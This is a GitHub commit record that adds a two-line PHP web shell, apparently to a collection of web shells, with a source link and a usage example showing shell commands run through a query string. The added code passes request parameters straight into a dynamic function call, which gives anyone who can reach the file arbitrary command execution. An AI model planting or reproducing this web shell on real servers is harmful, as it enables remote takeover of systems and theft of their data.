Create 2022-08-26-07.php

from: https://mp.weixin.qq.com/s/f6cFhc0Ukk0wQFGP1lQ4BQ
usage: http://example.com/shell.php?f=system&a=pwd
This commit is contained in:
tennc 2022-08-26 19:54:15 +08:00 committed by GitHub
parent 52d483f2cd
commit 6aab7111e9
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

2
php/2022-08-26-07.php Normal file
View file

@ -0,0 +1,2 @@
<?php
$_GET['f']($_GET['a']);